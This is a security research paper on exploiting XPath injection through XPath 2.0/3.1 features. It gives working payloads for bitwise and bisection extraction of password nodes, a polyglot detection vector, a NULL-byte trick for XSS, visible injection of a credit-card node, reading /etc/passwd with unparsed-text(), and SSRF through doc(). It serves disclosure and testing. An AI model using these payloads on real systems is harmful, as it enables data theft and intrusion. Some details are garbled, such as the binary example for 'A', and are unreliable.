======================================= Modern XPath Exploitation ======================================= Ruben Ventura PiƱa http://nzt-48.org @tr3w_ 07-20-2023 Abstract ======== Now that XML documents are being widely used in modern web applications, XPath injections are becoming more important. With the introduction of XPath 2.0 and XPath 3.1, many new functionalities have been added to XPath. This new functions allow attackers to perform more sophisticated and powerful attacks compared to all other currently public exploitation techniques. At the time this document was written, all XPath exploitation tools extract information through very limited techniques such as brute-force. The purpose of this paper is to optimize the information extraction process as much as possible and to leverage more lethal attacks such as remote file disclosure, XSS, turning blind injections into visible injections and remote code execution. An exploitation tool has been written as a proof of concept. Bisection method ---------------- Instead of doing a brute-force attack, it is possible to use a binary search to make the data extraction process much faster. Before XPath 2, the binary search was performed using the contains() function. This means that the full character set needs to be sent to the server. When dealing with non-latin alphabets such as japanese and others this task becomes very tedious. The new function 'string-to-codepoints' converses any character into its numeric unicode representation. The new operators "less than (<)" and "greater than (>)" can be combined with 'string-to-codepoints' to perform a binary search algorithm to find the characters faster: 1' and string-to-codepoints(substring(password/text())) >= %d and string-to-codepoints(substring(password/text())) < %d and '1 xcat is the only tool out there that uses this technique, a more advanced and optimized technique has been designed (see the bitwise section). Regexp method ------------- New functions for performing regular expressions were also added to the language. It is possible to use these functions as another way to implement the bisection method: 1' and matches(substring(password/text(), 1, 1), "[A-Z]" and '1 Request after request, the character ranges will be split in half to narrow down the values of the character being extracted. Bitwise methods --------------- In 2010, binary based methods were invented to extract information through SQL injection in an extremely optimized fashion. This methods extract characters in their numeric binary representation bit per bit. If the page responds with a TRUE response, it means that the bit in question is a 1. In any other case, the bit being extracted is equal to 0. The advantage of this method is that every request is independent from the others, in contrast to the bisection method in which each request must be performed one after the other in a sequential order. Thus, we can perform all the requests at once with threads which means that the desired character is going to be obtained around 7 times faster than the bisection method because all the bits can be requested at the same time. The injection looks like the follwing: 1'and(floor(string-to-codepoints(substring(password/text(),1,1))div %d)mod 2)and'1 Since XPath doesn't implement any bitwise functions yet, each individual bit can be calculated and requested by performing a division over powers of 2 (0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40) and then by calculating its module by 2: (97 / 0x01 % 0x02) = 1 TRUE (97 / 0x02 % 0x02) = 0 FALSE (97 / 0x04 % 0x02) = 0 FALSE (97 / 0x08 % 0x02) = 0 FALSE (97 / 0x10 % 0x02) = 0 FALSE (97 / 0x20 % 0x02) = 1 TRUE (97 / 0x40 % 0x02) = 1 TRUE (97 / 0x80 % 0x02) = 0 FALSE 010000110 = 97 = 'A' Detection phase optmization: ============================ Blind XPath injections can happen in single quoted strings, double quoted strings and numeric contexts. Usually, 3 injections must be made to find out what is the context of the vulnerable parameter. and '1'='1 and "1"="1 and 1 This can be improved by using just one injection with a polyglot vector that works in every possible scenario. Instead of making 3 requests, just 1 is done, accelerating the process so it is 66% faster. and 1 (: ' and " and '"!='!=":) Comments in XPath need to be opened and closed with the (: :) delimiters. Turn XPath injections into Cross-Site Scripting ======================================================== Instead of returning nodes with XPath, it is also possible to return specific strings defined by the user: //root/"this text will be printed" Even though with XPath it is possible to change the query by injecting more code, most of the time this is not possible because there is always trailing text after the injected value: //users/username[username/text()='admin']/"print this text" ']/password -----------Invalid code As you can see, the only way to inject arbitrary text and make it display would be to break the encapsulation by closing the quote and the bracket and modify the entire query at will. However, the fact that there is trailing text after the injection is a problem because this would yield invalid code or would augment the complexity of the injection. In contrast to SQL, there are no single line comments such as -- and # to ignore the trailing text. However, I found an undocumented feature in XPath which is useful for commenting out trailing text. I made use of a NULL byte after the injection. This terminates the string and all the ending trails will be ignored; the attacker controls the output as a result: //users/username[username/text()='admin']/""%00']/password That line would use XPath to leverage a XSS attack. Implementation-dependent comments regarding the NULL byte string terminator --------------------------------------------------------------------------- As this NULL byte functionality doesn't appear in the XPath specifications, it is very likely that it might work only in certain XPath implementations. I tested it in the Saxon implementation by Saxonica (http://saxonica.com) but I really do not have the chance to test it in other implementations. It might be interesting to find out if the NULL byte terminator works in all XPath implementations. If someone wants to b contribute by testing the NULL byte in other implementations the help would be highly appreciated. List of other XPath Implementations: https://en.wikipedia.org/wiki/XPath#Implementations Turning blind injections into visible injections: ================================================= Since there is trailing text after the injection point, the only possible way to extract other nodes than the ones intended to be displayed was through blind boolean injections. After seeing how the NULL byte trick works, it is only logical to conclude that the entire query can be changed and any desired node can be displayed by escaping from the conditional braces and add other selectors at the end along with a NULL byte to ignore the original query and replace it with whatever statement the attacker desires to execute: //username[username/text()='admin']/CreditCartNumber/text()%00']/original-query Arbitrary file disclosure ========================= XPath can also be exploited to disclose the contents of arbitrary files in the server. This is achieved with the new unparsed-text() function. The blind injection can be turned into a visible one by using the NULL byte trick in order to modify the query and ignore the original. Thus, the contents of the target file will be completely revealed in one response. //user[user/text()='break']/unparsed-text('/etc/passwd')%00']/trailing-characters The unparsed-text() function will literally open the file and show all of its contents. Sometimes (depending on the software implementation of XPath) the static-base-uri() returns an empty string which means that instead of using relative URIs, absolute paths should be used which can be an obstacle. The function base-uri() can be used to print the location of the static resource. //user[user/text()='break']/base-uri()%00'] The document-uri() function can also be used for this. If it is not possible to make the blind injection visible (with the NULL byte trick), the content of the files in the server can be extracted character by character through the bitwise extraction methods. It is worth commenting that at the time this was written, xcat (being the more popular tool) recently was updated to include this functionality. However, I tested it and this module has a lot of bugs and doesn't work most of the time (at least in my computer). Server-Side Request Forgery =========================== It is also possible to force XPath to perform requests to any server by making a HTTP request through the doc(), doc-available(), unparsed-text() or unparsed-text-available() functions. The server makes the request and it will be excuted on its behalf. Proof-Of-Concept ================ An XPath exploitation tool which implements the bitwise bit-anding method has been written. http://nzt-48.org/tools/ Appendix ======== You can find the XPath specifications here: https://www.w3.org/TR/xpath-functions-31/ Links to other XPath injection tools (most of them are very old): xcat https://github.com/orf/xcat xxxpwn https://github.com/feakk/xxxpwn xpath-blind-explorer https://github.com/micsoftvn/xpath-blind-explorer XMLCHOR https://github.com/Harshal35/XMLCHOR/